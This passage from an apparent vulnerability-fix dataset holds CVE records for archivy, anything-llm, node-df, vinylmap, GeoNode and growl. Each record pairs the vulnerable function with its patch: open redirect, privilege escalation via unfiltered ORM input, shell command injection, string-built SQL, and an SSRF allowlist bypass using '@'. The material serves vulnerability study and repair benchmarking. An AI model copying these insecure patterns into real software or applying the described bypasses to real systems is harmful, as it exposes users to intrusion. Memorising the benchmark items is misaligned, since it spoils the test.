return redirect(f\"/dataobj/{dataobj_id}\")\n else:\n flash(f\"Data could not be moved to {out_dir}.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n except FileNotFoundError:\n flash(\"Data not found.\", \"error\")\n return redirect(\"/\")\n except FileExistsError:\n flash(\"Data already in target directory.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n\n\n@app.route(\"/dataobj/delete/\", methods=[\"POST\"])\ndef delete_data(dataobj_id):\n try:\n data.delete_item(dataobj_id)\n except BaseException:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n flash(\"Data deleted!\", \"success\")\n return redirect(\"/\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = forms.UserForm()\n if form.validate_on_submit():\n db = get_db()\n user = db.search(\n (Query().username == form.username.data) & (Query().type == \"user\")\n )\n\n if user and 
check_password_hash(user[0][\"hashed_password\"], form.password.data):\n user = User.from_db(user[0])\n login_user(user, remember=True)\n flash(\"Login successful!\", \"success\")\n\n next_url = request.args.get(\"next\")\n if next_url and is_safe_redirect_url(next_url):\n return redirect(next_url)\n else:\n return redirect(\"/\")\n\n flash(\"Invalid credentials\", \"error\")\n return redirect(\"/login\")\n return render_template(\"users/login.html\", form=form, title=\"Login\")"}, {"id": "fix_py_319_2", "commit": "2d8cb29", "file_path": "archivy/helpers.py", "start_line": "236", "end_line": "242", "snippet": "def is_safe_redirect_url(target):\n host_url = urlparse(request.host_url)\n redirect_url = urlparse(urljoin(request.host_url, target))\n return (\n redirect_url.scheme in (\"http\", \"https\")\n and host_url.netloc == redirect_url.netloc\n )"}], "vul_patch": "--- a/archivy/routes.py\n+++ b/archivy/routes.py\n@@ -224,7 +224,10 @@\n flash(\"Login successful!\", \"success\")\n \n next_url = request.args.get(\"next\")\n- return redirect(next_url or \"/\")\n+ if next_url and is_safe_redirect_url(next_url):\n+ return redirect(next_url)\n+ else:\n+ return redirect(\"/\")\n \n flash(\"Invalid credentials\", \"error\")\n return redirect(\"/login\")\n\n--- /dev/null\n+++ b/archivy/routes.py\n@@ -0,0 +1,7 @@\n+def is_safe_redirect_url(target):\n+ host_url = urlparse(request.host_url)\n+ redirect_url = urlparse(urljoin(request.host_url, target))\n+ return (\n+ redirect_url.scheme in (\"http\", \"https\")\n+ and host_url.netloc == redirect_url.netloc\n+ )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-3150", "cve_description": "In mintplex-labs/anything-llm, a vulnerability exists in the thread update process that allows users with Default or Manager roles to escalate their privileges to Administrator. The issue arises from improper input validation when handling HTTP POST requests to the endpoint `/workspace/:slug/thread/:threadSlug/update`. Specifically, the application fails to validate or check user input before passing it to the `workspace_thread` Prisma model for execution. This oversight allows attackers to craft a Prisma relation query operation that manipulates the `users` model to change a user's role to admin. 
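The archivy record above guards the `next` parameter with a netloc comparison (fix_py_319_2). A minimal standalone sketch of the same check, with illustrative hosts and two of the redirect shapes it is meant to reject:

```python
from urllib.parse import urljoin, urlparse

def is_safe_redirect_url(target: str, host_url: str) -> bool:
    base = urlparse(host_url)
    # urljoin resolves relative targets against our own host first,
    # so "/path" stays local while absolute URLs keep their own netloc
    dest = urlparse(urljoin(host_url, target))
    return dest.scheme in ("http", "https") and base.netloc == dest.netloc

assert is_safe_redirect_url("/dataobj/1", "http://example.com/")               # same host: allowed
assert not is_safe_redirect_url("https://evil.test/", "http://example.com/")  # foreign host: rejected
assert not is_safe_redirect_url("//evil.test/", "http://example.com/")        # protocol-relative: rejected
print("checks pass")
```

One caveat worth noting: urlparse does not treat backslashes as path separators while browsers often do, so a target like `/\evil.test` can slip past netloc comparisons of this shape; the sketch, like the original, assumes well-formed input.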
Successful exploitation grants attackers the highest level of user privileges, enabling them to see and perform all actions within the system.", "cwe_info": {"CWE-755": {"name": "Improper Handling of Exceptional Conditions", "description": "The product does not handle or incorrectly handles an exceptional condition."}}, "repo": "https://github.com/mintplex-labs/anything-llm", "patch_url": ["https://github.com/mintplex-labs/anything-llm/commit/200bd7f0615347ed2efc07903d510e5a208b0afc"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_307_1", "commit": "b1a2fa6385bcbbc236454702a308f3c2e7baedb2", "file_path": "server/models/workspaceThread.js", "start_line": 25, "end_line": 44, "snippet": " update: async function (prevThread = null, data = {}) {\n if (!prevThread) throw new Error(\"No thread id provided for update\");\n\n const validKeys = Object.keys(data).filter((key) =>\n this.writable.includes(key)\n );\n if (validKeys.length === 0)\n return { thread: prevThread, message: \"No valid fields to update!\" };\n\n try {\n const thread = await prisma.workspace_threads.update({\n where: { id: prevThread.id },\n data,\n });\n return { thread, message: null };\n } catch (error) {\n console.error(error.message);\n return { thread: null, message: error.message };\n }\n },"}], "fix_func": [{"id": "fix_js_307_1", "commit": "200bd7f0615347ed2efc07903d510e5a208b0afc", "file_path": "server/models/workspaceThread.js", "start_line": 25, "end_line": 47, "snippet": " update: async function (prevThread = null, data = {}) {\n if (!prevThread) throw new Error(\"No thread id provided for update\");\n\n const validData = {};\n Object.entries(data).forEach(([key, value]) => {\n if (!this.writable.includes(key)) return;\n validData[key] = value;\n });\n\n if (Object.keys(validData).length === 0)\n return { thread: prevThread, message: \"No valid fields to update!\" };\n\n try {\n const thread = await prisma.workspace_threads.update({\n where: { id: prevThread.id },\n data: validData,\n });\n return { thread, message: null };\n } catch (error) {\n console.error(error.message);\n return { thread: null, message: error.message };\n }\n },"}], "vul_patch": "--- a/server/models/workspaceThread.js\n+++ b/server/models/workspaceThread.js\n@@ -1,16 +1,19 @@\n update: async function (prevThread = null, data = {}) {\n if (!prevThread) throw new Error(\"No thread id provided for update\");\n \n- const validKeys = Object.keys(data).filter((key) =>\n- this.writable.includes(key)\n- );\n- if (validKeys.length === 0)\n+ const validData = {};\n+ Object.entries(data).forEach(([key, value]) => {\n+ if (!this.writable.includes(key)) return;\n+ validData[key] = value;\n+ });\n+\n+ if (Object.keys(validData).length === 0)\n return { thread: prevThread, message: \"No valid fields to update!\" };\n \n try {\n const thread = await prisma.workspace_threads.update({\n where: { id: prevThread.id },\n- data,\n+ data: validData,\n });\n return { thread, message: null };\n } catch (error) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-15597", "cve_description": "A code injection exists in node-df v0.1.4 that can allow an attacker to remote code execution by unsanitized input.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or 
behavior of the intended code segment."}}, "repo": "https://github.com/adriano-di-giovanni/node-df", "patch_url": ["https://github.com/adriano-di-giovanni/node-df/commit/72bcceab653bc064583d438072eb20f2d73654be"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_13_1", "commit": "c0b554a", "file_path": "lib/index.js", "start_line": 41, "end_line": 55, "snippet": " exec(command, function(err, stdout, stderr) {\n if (err) {\n callback(err)\n return\n }\n\n if (stderr) {\n callback(new Error(err))\n return\n }\n\n var entries = parse(stdout, options)\n\n callback(null, entries)\n })"}], "fix_func": [{"id": "fix_js_13_1", "commit": "72bcceab653bc064583d438072eb20f2d73654be", "file_path": "lib/index.js", "start_line": 41, "end_line": 60, "snippet": "// escaping chars to prevent command injection\n var escapeShell = function(command) {\n return '\"'+command.replace(/([\"\\s'$`\\])/g,'\\$1')+'\"'\n };\n exec(escapeShell(command), function(err, stdout, stderr) {\n if (err) {\n callback(err)\n return\n }\n\n if (stderr) {\n callback(new Error(err))\n return\n }\n\n var entries = parse(stdout, options)\n\n callback(null, entries)\n })"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -1,4 +1,4 @@\n- exec(command, function(err, stdout, stderr) {\n+ exec(escapeShell(command), function(err, stdout, stderr) {\n if (err) {\n callback(err)\n return\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-15597:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-df\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": " #!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-15597:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-df\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpm test lib/__tests__/calcMultipliers.spec.js lib/__tests__/index.spec.js"} {"cve_id": "CVE-2015-10056", "cve_description": "A vulnerability was found in 2071174A vinylmap. It has been classified as critical. Affected is the function contact of the file recordstoreapp/views.py. The manipulation leads to sql injection. The name of the patch is b07b79a1e92cc62574ba0492cce000ef4a7bd25f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218400.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
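The anything-llm record above (CVE-2024-3150) turns on the difference between checking writable keys and actually dropping the non-writable ones: the vulnerable `update` counted valid keys but still handed the raw payload to Prisma, so a crafted `users` relation query rode along. A language-neutral sketch of the fixed shape, written in Python for consistency with the other notes here (the allowlist and payload are illustrative):

```python
WRITABLE = {"name", "slug"}  # illustrative allowlist of updatable fields

def sanitize_update(data: dict) -> dict:
    # Copy only allowlisted keys into a fresh object; everything else,
    # including relation operators, is silently dropped.
    valid = {k: v for k, v in data.items() if k in WRITABLE}
    if not valid:
        raise ValueError("No valid fields to update!")
    return valid

payload = {"name": "renamed thread",
           "users": {"update": {"where": {"id": 1}, "data": {"role": "admin"}}}}
print(sanitize_update(payload))  # {'name': 'renamed thread'} -- relation query dropped
```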
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/2071174A/vinylmap", "patch_url": ["https://github.com/2071174A/vinylmap/commit/b07b79a1e92cc62574ba0492cce000ef4a7bd25f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_378_1", "commit": "781d517b0d234d3fb51c9cb46584f0cf58e67675", "file_path": "recordstoreapp/views.py", "start_line": 25, "end_line": 47, "snippet": "def search(request):\n\tcontext_dict = {}\n\tif 'q' in request.GET and request.GET['q'] != '':\n\t\tq = request.GET['q']\n\t\tcursor = connection.cursor()\n\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like '%\" + q + \"%' or artist like '%\" + q + \"%' or label like '%\" + q + \"%' or cat_no like '%\" + q + \"%';\")\n\t\trec_list=cursor.fetchall()\n\t\t\n\t\ttotal=len(rec_list)\n\t\tpg=int(request.GET['page']) if 'page' in request.GET else 1\n\t\tub=min(pg*12, total)\n\n\t\tcontext_dict['rec_list'] = rec_list[(pg-1)*12:ub]\n\t\tmaxrange = int(total/12)\n\t\tif total%12 > 0: \n\t\t\tmaxrange = maxrange + 1\n\t\tif maxrange == 1: \n\t\t\tmaxrange = 0\n\t\tcontext_dict['range'] = range(1,maxrange+1)\n\t\tprint total\n\t\tcontext_dict['q'] = q\n\n\treturn render(request, 'search.html', context_dict)"}], "fix_func": [{"id": "fix_py_378_1", "commit": "b07b79a1e92cc62574ba0492cce000ef4a7bd25f", "file_path": "recordstoreapp/views.py", "start_line": 25, "end_line": 49, "snippet": "def search(request):\n\tcontext_dict = {}\n\tq = request.GET['q'].replace('%', '').replace('_', '').strip()\n\tif 'q' in request.GET and q != '':\n\t\tq = '%' + q + '%'\n\t\tcursor = connection.cursor()\n\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like %s or artist like %s or label like %s or cat_no like %s;\", [q,q,q,q])\n\t\trec_list=cursor.fetchall()\n\t\t\n\n\t\ttotal=len(rec_list)\n\t\tpg=int(request.GET['page']) if 'page' in request.GET else 1\n\t\tub=min(pg*12, total)\n\n\t\tcontext_dict['rec_list'] = rec_list[(pg-1)*12:ub]\n\t\tmaxrange = int(total/12)\n\t\tif total%12 > 0: \n\t\t\tmaxrange = maxrange + 1\n\t\tif maxrange == 1: \n\t\t\tmaxrange = 0\n\t\tcontext_dict['range'] = range(1,maxrange+1)\n\t\tprint total\n\t\tcontext_dict['q'] = q\n\n\treturn render(request, 'search.html', context_dict)"}], "vul_patch": "--- a/recordstoreapp/views.py\n+++ b/recordstoreapp/views.py\n@@ -1,11 +1,13 @@\n def search(request):\n \tcontext_dict = {}\n-\tif 'q' in request.GET and request.GET['q'] != '':\n-\t\tq = request.GET['q']\n+\tq = request.GET['q'].replace('%', '').replace('_', '').strip()\n+\tif 'q' in request.GET and q != '':\n+\t\tq = '%' + q + '%'\n \t\tcursor = connection.cursor()\n-\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like '%\" + q + \"%' or artist like '%\" + q + \"%' or label like '%\" + q + \"%' or cat_no like '%\" + q + \"%';\")\n+\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like %s or artist like %s or label like %s or cat_no like %s;\", [q,q,q,q])\n \t\trec_list=cursor.fetchall()\n \t\t\n+\n \t\ttotal=len(rec_list)\n \t\tpg=int(request.GET['page']) if 'page' in request.GET else 1\n \t\tub=min(pg*12, total)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-42439", "cve_description": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative 
use of geospatial data. A SSRF vulnerability exists starting in version 3.2.0, bypassing existing controls on the software. This can allow a user to request internal services for a full read SSRF, returning any data from the internal network. The application is using a whitelist, but the whitelist can be bypassed. The bypass will trick the application that the first host is a whitelisted address, but the browser will use `@` or `%40` as a credential to the host geoserver on port 8080, this will return the data to that host on the response. Version 4.1.3.post1 is the first available version that contains a patch.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/GeoNode/geonode", "patch_url": ["https://github.com/GeoNode/geonode/commit/79ac6e70419c2e0261548bed91c159b54ff35b8d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_261_1", "commit": "abd1baf", "file_path": "geonode/utils.py", "start_line": 1910, "end_line": 1927, "snippet": "def extract_ip_or_domain(url):\n ip_regex = re.compile(\"^(?:http://|https://)(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http://|https://)([a-zA-Z0-9.-]+)\")\n\n match = ip_regex.findall(url)\n if len(match):\n ip_address = match[0]\n try:\n ipaddress.ip_address(ip_address) # Validate the IP address\n return ip_address\n except ValueError:\n pass\n\n match = domain_regex.findall(url)\n if len(match):\n return match[0]\n\n return None"}], "fix_func": [{"id": "fix_py_261_2", "commit": "79ac6e7", "file_path": "geonode/utils.py", "start_line": 1911, "end_line": 1921, "snippet": "def remove_credentials_from_url(url):\n # Parse the URL\n parsed_url = urlparse(url)\n\n # Remove the username and password from the parsed URL\n parsed_url = parsed_url._replace(netloc=parsed_url.netloc.split(\"@\")[-1])\n\n # Reconstruct the URL without credentials\n cleaned_url = urlunparse(parsed_url)\n\n return cleaned_url"}, {"id": "fix_py_261_1", "commit": "79ac6e7", "file_path": "geonode/utils.py", "start_line": 1924, "end_line": 1944, "snippet": "def extract_ip_or_domain(url):\n # Decode the URL to handle percent-encoded characters\n _url = remove_credentials_from_url(unquote(url))\n\n ip_regex = re.compile(\"^(?:http://|https://)(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http://|https://)([a-zA-Z0-9.-]+)\")\n\n match = ip_regex.findall(_url)\n if len(match):\n ip_address = match[0]\n try:\n ipaddress.ip_address(ip_address) # Validate the IP address\n return ip_address\n except ValueError:\n pass\n\n match = domain_regex.findall(_url)\n if len(match):\n return match[0]\n\n return None"}], "vul_patch": "--- a/geonode/utils.py\n+++ b/geonode/utils.py\n@@ -1,8 +1,11 @@\n def extract_ip_or_domain(url):\n+ # Decode the URL to handle percent-encoded characters\n+ _url = remove_credentials_from_url(unquote(url))\n+\n ip_regex = re.compile(\"^(?:http://|https://)(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http://|https://)([a-zA-Z0-9.-]+)\")\n \n- match = ip_regex.findall(url)\n+ match = ip_regex.findall(_url)\n if len(match):\n ip_address = match[0]\n try:\n@@ -11,7 +14,7 @@\n except ValueError:\n pass\n \n- match = domain_regex.findall(url)\n+ 
match = domain_regex.findall(_url)\n if len(match):\n return match[0]\n \n\n--- /dev/null\n+++ b/geonode/utils.py\n@@ -0,0 +1,11 @@\n+def remove_credentials_from_url(url):\n+ # Parse the URL\n+ parsed_url = urlparse(url)\n+\n+ # Remove the username and password from the parsed URL\n+ parsed_url = parsed_url._replace(netloc=parsed_url.netloc.split(\"@\")[-1])\n+\n+ # Reconstruct the URL without credentials\n+ cleaned_url = urlunparse(parsed_url)\n+\n+ return cleaned_url\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-16042", "cve_description": "Growl adds growl notification support to nodejs. Growl before 1.10.2 does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/tj/node-growl", "patch_url": ["https://github.com/tj/node-growl/commit/d71177d5331c9de4658aca62e0ac921f178b0669"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_44_2", "commit": "dc8aae0", "file_path": "lib/growl.js", "start_line": 164, "end_line": 290, "snippet": "function growl(msg, options, fn) {\n var image\n , args\n , options = options || {}\n , fn = fn || function(){};\n\n if (options.exec) {\n cmd = {\n type: \"Custom\"\n , pkg: options.exec\n , range: []\n };\n }\n\n // noop\n if (!cmd) return fn(new Error('growl not supported on this platform'));\n args = [cmd.pkg];\n\n // image\n if (image = options.image) {\n switch(cmd.type) {\n case 'Darwin-Growl':\n var flag, ext = path.extname(image).substr(1)\n flag = flag || ext == 'icns' && 'iconpath'\n flag = flag || /^[A-Z]/.test(image) && 'appIcon'\n flag = flag || /^png|gif|jpe?g$/.test(ext) && 'image'\n flag = flag || ext && (image = ext) && 'icon'\n flag = flag || 'icon'\n args.push('--' + flag, quote(image))\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.icon, quote(image));\n break;\n case 'Linux':\n args.push(cmd.icon, quote(image));\n // libnotify defaults to sticky, set a hint for transient notifications\n if (!options.sticky) args.push('--hint=int:transient:1');\n break;\n case 'Windows':\n args.push(cmd.icon + quote(image));\n break;\n }\n }\n\n // sticky\n if (options.sticky) args.push(cmd.sticky);\n\n // priority\n if (options.priority) {\n var priority = options.priority + '';\n var checkindexOf = cmd.priority.range.indexOf(priority);\n if (~cmd.priority.range.indexOf(priority)) {\n 
args.push(cmd.priority, options.priority);\n }\n }\n\n //sound\n if(options.sound && cmd.type === 'Darwin-NotificationCenter'){\n args.push(cmd.sound, options.sound)\n }\n\n // name\n if (options.name && cmd.type === \"Darwin-Growl\") {\n args.push('--name', options.name);\n }\n\n switch(cmd.type) {\n case 'Darwin-Growl':\n args.push(cmd.msg);\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(quote(options.title));\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.msg);\n var stringifiedMsg = quote(msg);\n var escapedMsg = stringifiedMsg.replace(/\\\\n/g, '\\n');\n args.push(escapedMsg);\n if (options.title) {\n args.push(cmd.title);\n args.push(quote(options.title));\n }\n if (options.subtitle) {\n args.push(cmd.subtitle);\n args.push(quote(options.subtitle));\n }\n if (options.url) {\n args.push(cmd.url);\n args.push(quote(options.url));\n }\n break;\n case 'Linux-Growl':\n args.push(cmd.msg);\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(quote(options.title));\n if (cmd.host) {\n args.push(cmd.host.cmd, cmd.host.hostname)\n }\n break;\n case 'Linux':\n if (options.title) {\n args.push(quote(options.title));\n args.push(cmd.msg);\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n } else {\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n }\n break;\n case 'Windows':\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(cmd.title + quote(options.title));\n if (options.url) args.push(cmd.url + quote(options.url));\n break;\n case 'Custom':\n args[0] = (function(origCommand) {\n var message = options.title\n ? options.title + ': ' + msg\n : msg;\n var command = origCommand.replace(/(^|[^%])%s/g, '$1' + quote(message));\n if (command === origCommand) args.push(quote(message));\n return command;\n })(args[0]);\n break;\n }\n\n // execute\n exec(args.join(' '), fn);\n};"}], "fix_func": [{"id": "fix_js_44_2", "commit": "d71177d5331c9de4658aca62e0ac921f178b0669", "file_path": "lib/growl.js", "start_line": 163, "end_line": 289, "snippet": "function growl(msg, options, fn) {\n var image\n , args\n , options = options || {}\n , fn = fn || function(){};\n\n if (options.exec) {\n cmd = {\n type: \"Custom\"\n , pkg: options.exec\n , range: []\n };\n }\n\n // noop\n if (!cmd) return fn(new Error('growl not supported on this platform'));\n args = [cmd.pkg];\n\n // image\n if (image = options.image) {\n switch(cmd.type) {\n case 'Darwin-Growl':\n var flag, ext = path.extname(image).substr(1)\n flag = flag || ext == 'icns' && 'iconpath'\n flag = flag || /^[A-Z]/.test(image) && 'appIcon'\n flag = flag || /^png|gif|jpe?g$/.test(ext) && 'image'\n flag = flag || ext && (image = ext) && 'icon'\n flag = flag || 'icon'\n args.push('--' + flag, image)\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.icon, image);\n break;\n case 'Linux':\n args.push(cmd.icon, image);\n // libnotify defaults to sticky, set a hint for transient notifications\n if (!options.sticky) args.push('--hint=int:transient:1');\n break;\n case 'Windows':\n args.push(cmd.icon + image);\n break;\n }\n }\n\n // sticky\n if (options.sticky) args.push(cmd.sticky);\n\n // priority\n if (options.priority) {\n var priority = options.priority + '';\n var checkindexOf = cmd.priority.range.indexOf(priority);\n if (~cmd.priority.range.indexOf(priority)) {\n args.push(cmd.priority, options.priority);\n }\n }\n\n //sound\n if(options.sound && cmd.type === 'Darwin-NotificationCenter'){\n args.push(cmd.sound, options.sound)\n }\n\n // name\n 
if (options.name && cmd.type === \"Darwin-Growl\") {\n args.push('--name', options.name);\n }\n\n switch(cmd.type) {\n case 'Darwin-Growl':\n args.push(cmd.msg);\n args.push(msg.replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(options.title);\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.msg);\n var stringifiedMsg = msg;\n var escapedMsg = stringifiedMsg.replace(/\\\\n/g, '\\n');\n args.push(escapedMsg);\n if (options.title) {\n args.push(cmd.title);\n args.push(options.title);\n }\n if (options.subtitle) {\n args.push(cmd.subtitle);\n args.push(options.subtitle);\n }\n if (options.url) {\n args.push(cmd.url);\n args.push(options.url);\n }\n break;\n case 'Linux-Growl':\n args.push(cmd.msg);\n args.push(msg.replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(options.title);\n if (cmd.host) {\n args.push(cmd.host.cmd, cmd.host.hostname)\n }\n break;\n case 'Linux':\n if (options.title) {\n args.push(options.title);\n args.push(cmd.msg);\n args.push(msg.replace(/\\\\n/g, '\\n'));\n } else {\n args.push(msg.replace(/\\\\n/g, '\\n'));\n }\n break;\n case 'Windows':\n args.push(msg.replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(cmd.title + options.title);\n if (options.url) args.push(cmd.url + options.url);\n break;\n case 'Custom':\n args[0] = (function(origCommand) {\n var message = options.title\n ? options.title + ': ' + msg\n : msg;\n var command = origCommand.replace(/(^|[^%])%s/g, '$1' + message);\n if (command === origCommand) args.push(message);\n return command;\n })(args[0]);\n break;\n }\n var cmd_to_exec = args[0];\n args.shift();\n spawn(cmd_to_exec, args);\n};"}], "vul_patch": "--- a/lib/growl.js\n+++ b/lib/growl.js\n@@ -26,18 +26,18 @@\n flag = flag || /^png|gif|jpe?g$/.test(ext) && 'image'\n flag = flag || ext && (image = ext) && 'icon'\n flag = flag || 'icon'\n- args.push('--' + flag, quote(image))\n+ args.push('--' + flag, image)\n break;\n case 'Darwin-NotificationCenter':\n- args.push(cmd.icon, quote(image));\n+ args.push(cmd.icon, image);\n break;\n case 'Linux':\n- args.push(cmd.icon, quote(image));\n+ args.push(cmd.icon, image);\n // libnotify defaults to sticky, set a hint for transient notifications\n if (!options.sticky) args.push('--hint=int:transient:1');\n break;\n case 'Windows':\n- args.push(cmd.icon + quote(image));\n+ args.push(cmd.icon + image);\n break;\n }\n }\n@@ -67,61 +67,61 @@\n switch(cmd.type) {\n case 'Darwin-Growl':\n args.push(cmd.msg);\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n- if (options.title) args.push(quote(options.title));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n+ if (options.title) args.push(options.title);\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.msg);\n- var stringifiedMsg = quote(msg);\n+ var stringifiedMsg = msg;\n var escapedMsg = stringifiedMsg.replace(/\\\\n/g, '\\n');\n args.push(escapedMsg);\n if (options.title) {\n args.push(cmd.title);\n- args.push(quote(options.title));\n+ args.push(options.title);\n }\n if (options.subtitle) {\n args.push(cmd.subtitle);\n- args.push(quote(options.subtitle));\n+ args.push(options.subtitle);\n }\n if (options.url) {\n args.push(cmd.url);\n- args.push(quote(options.url));\n+ args.push(options.url);\n }\n break;\n case 'Linux-Growl':\n args.push(cmd.msg);\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n- if (options.title) args.push(quote(options.title));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n+ if (options.title) args.push(options.title);\n if (cmd.host) {\n args.push(cmd.host.cmd, cmd.host.hostname)\n }\n 
break;\n case 'Linux':\n if (options.title) {\n- args.push(quote(options.title));\n+ args.push(options.title);\n args.push(cmd.msg);\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n } else {\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n }\n break;\n case 'Windows':\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n- if (options.title) args.push(cmd.title + quote(options.title));\n- if (options.url) args.push(cmd.url + quote(options.url));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n+ if (options.title) args.push(cmd.title + options.title);\n+ if (options.url) args.push(cmd.url + options.url);\n break;\n case 'Custom':\n args[0] = (function(origCommand) {\n var message = options.title\n ? options.title + ': ' + msg\n : msg;\n- var command = origCommand.replace(/(^|[^%])%s/g, '$1' + quote(message));\n- if (command === origCommand) args.push(quote(message));\n+ var command = origCommand.replace(/(^|[^%])%s/g, '$1' + message);\n+ if (command === origCommand) args.push(message);\n return command;\n })(args[0]);\n break;\n }\n-\n- // execute\n- exec(args.join(' '), fn);\n+ var cmd_to_exec = args[0];\n+ args.shift();\n+ spawn(cmd_to_exec, args);\n };\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2017-16042:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-growl\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-29189", "cve_description": "PyAnsys Geometry is a Python client library for the Ansys Geometry service and other CAD Ansys products. On file src/ansys/geometry/core/connection/product_instance.py, upon calling this method _start_program directly, users could exploit its usage to perform malicious operations on the current machine where the script is ran. 
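The two command-injection records above resolve the same weakness in different ways: node-df (CVE-2019-15597) wraps the command in quotes behind an escaping regex, while growl (CVE-2017-16042) drops `exec(args.join(' '))` in favor of `spawn(cmd, args)`, passing arguments as a vector so no shell ever parses them. A sketch of the argv-based pattern transposed to Python; the `df` invocation is only a stand-in target:

```python
import subprocess

user_path = "/tmp; rm -rf ~"  # hostile input: shell metacharacters embedded

# Vulnerable shape (do not use): a shell parses the string, so the
# semicolon splits it into a second command.
#   subprocess.run(f"df -k {user_path}", shell=True)

# argv-based shape: no shell is involved, so the whole string reaches
# df as one literal argument and the embedded command never runs.
result = subprocess.run(["df", "-k", user_path], capture_output=True, text=True)
print(result.returncode)  # non-zero: df just reports an unknown path
```

Quote-and-escape helpers such as `escapeShell` are easy to get wrong across shells and quoting contexts; an argument vector sidesteps the parsing step entirely, which is why the growl fix is the more robust of the two.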
